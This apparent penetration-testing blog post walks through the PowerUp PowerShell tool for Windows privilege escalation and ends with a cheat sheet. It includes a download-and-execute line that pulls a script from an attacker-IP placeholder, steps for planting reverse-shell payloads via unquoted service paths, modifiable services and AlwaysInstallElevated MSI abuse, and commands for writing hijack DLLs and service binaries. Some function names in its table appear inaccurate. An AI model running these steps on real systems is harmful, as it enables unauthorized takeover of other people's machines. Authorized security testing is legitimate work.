PowerUp: Windows Privilege Escalation
When you’re dropped into a Windows shell during an engagement, one of your top priorities is figuring out how to escalate privileges — ideally from a low-privileged user to SYSTEM. PowerUp, a PowerShell tool from the PowerSploit framework, was made for exactly this.
In this post, we’ll walk through what PowerUp is, how it works, and how to use it to find privilege escalation paths during an assessment. Let’s dig in.
What is PowerUp?
PowerUp is a PowerShell script designed to automatically search for common privilege escalation vectors on Windows systems. It performs a variety of checks to help identify misconfigurations, unquoted service paths, vulnerable registry settings, and more.
Key Features:
- Detects unquoted service paths
- Checks service permissions
- Looks for modifiable registry autoruns
- Finds vulnerable DLL hijack paths
- Identifies AlwaysInstallElevated policy abuse
- Searches for cleartext credentials
- Checks for vulnerable file/folder permissions
Why Use PowerUp?
While you can manually search for privilege escalation vectors using tools like whoami /priv, icacls, or accesschk, PowerUp automates a huge chunk of this work, saving you time and often catching things you’d miss.
PowerUp is perfect for post-exploitation or C2 sessions when you have limited time or need quick wins.
Step-by-Step: Using PowerUp
Step 1: Get PowerUp onto the target
You can get PowerUp from GitHub:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
Transfer it to the victim machine. You can host it on your machine and use Invoke-WebRequest or certutil.
# Example: Download PowerUp.ps1 from a remote server
IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>/PowerUp.ps1')
Or upload it manually if you already have a foothold and file transfer capability.
Step 2: Import the script
Once it’s on the box, import it into the current PowerShell session:
. .\PowerUp.ps1
The leading dot and space (. .\) are required to dot-source the script so you can access its functions.
Step 3: Run the checks
Now run the main scan function:
Invoke-AllChecks
This command runs all PowerUp’s modules and outputs anything potentially useful for escalation.
Use
| Out-File output.txtto save the results for analysis.
Notable PowerUp Functions
Here are some powerful individual modules:
Invoke-ServiceUnquoted # Finds unquoted service paths
Invoke-ServiceDLLHijack # Looks for hijackable service DLL paths
Get-ModifiableService # Finds services that current user can modify
Get-RegAlwaysInstallElevated # Checks for AlwaysInstallElevated
Get-ModifiableRegistryAutoRun # Finds vulnerable autorun registry keys
Example:
Invoke-ServiceUnquoted
# Lists services with unquoted paths that include spaces and are writable
Common Escalation Paths Found with PowerUp
1. Unquoted Service Paths
Invoke-ServiceUnquoted
If a service path looks like:
C:\Program Files\Some Folder\someapp.exe
And you can write to C:\Program Files\Some Folder\, you can drop a malicious executable named someapp.exe in that folder and reboot the service.
2. Modifiable Services
Get-ModifiableService
This shows services where you have permissions to reconfigure the binary path. You can point the service to your reverse shell payload and start it.
3. AlwaysInstallElevated
Get-RegAlwaysInstallElevated
If both HKCU and HKLM contain this set to 1, you can install an MSI package with SYSTEM privileges:
msiexec /quiet /qn /i reverse.msi
4. Registry Autorun Hijack
Get-ModifiableRegistryAutoRun
If an autorun key points to a binary and you can edit it, you can insert your payload for execution on reboot or login.
PowerUp Cheat Sheet for Pentesters
Comprehensive Privilege Escalation Discovery on Windows
Core Usage
# Import PowerUp
. .\PowerUp.ps1
# Run all checks
Invoke-AllChecks
# Quick, filtered scan for likely privesc paths
Invoke-PrivescAudit
Full List of PowerUp Functions
| Function | Description | Use Case |
|---|---|---|
| Invoke-AllChecks | Runs all modules in PowerUp | Full enumeration across registry, services, file perms, etc. |
| Invoke-PrivescAudit | High-signal audit of common escalation vectors | Use when you want the most likely and actionable privesc leads |
| Invoke-CheckVuln | Very lightweight vuln summary | Faster and quieter than AllChecks |
| Invoke-ServiceUnquoted | Finds services with unquoted paths | Exploit by dropping payload in writable space within path |
| Invoke-ServiceDLLHijack | Finds hijackable DLL paths in services | Drop malicious DLL to escalate when service runs |
| Get-ModifiableService | Finds services you can reconfigure | Change the binary path to launch your payload |
| Get-ServiceDetail | Shows full config of a specific service | Investigate interesting services |
| Get-InterestingServices | Lists “interesting” services (e.g., backup, VNC, etc.) | Good for manual review |
| Get-ServicePermission | Shows service permissions for the current user | Check if you can start/stop/configure services |
| Get-ServiceFilePermission | Shows access permissions on service executables | Check if you can overwrite them |
| Get-ModifiableRegistryAutoRun | Finds writable autorun registry keys | Modify for persistence or escalation |
| Get-RegAlwaysInstallElevated | Checks for AlwaysInstallElevated policy | MSI abuse for SYSTEM privilege |
| Invoke-AllAutoruns | Lists all registry-based autoruns | Look for persistence vectors |
| Get-ModifiableScheduledTask | Lists scheduled tasks you can modify | Escalate via scheduled task hijack |
| Write-HijackDll | Creates a simple DLL payload for hijacking | Use with vulnerable services or paths |
| Write-ServiceBinary | Writes a binary to a writable service path | Helps exploit writable paths or binaries |
| Invoke-InstallElevatedCheck | Standalone AlwaysInstallElevated checker | Same as Get-RegAlwaysInstallElevated, alternative call |
Quick Payload Usage Example
# Check for AlwaysInstallElevated vulnerability
Get-RegAlwaysInstallElevated
# Create a malicious service DLL
Write-HijackDll -Path "C:\Users\Public\evil.dll" -Command "cmd.exe"
# Write a binary to a service path you control
Write-ServiceBinary -ServiceName "VulnService" -Command "C:\Users\Public\reverse.exe"
Field Tips
- Use
Invoke-PrivescAuditfirst if you want fast, actionable results. - Always run
. .\PowerUp.ps1(dot sourcing) to expose functions in memory. - Pipe outputs to a file if you’re in a noisy shell:
Invoke-PrivescAudit | Out-File audit.txt - If you’re being noisy or need to stay low-profile, skip
Invoke-AllChecks.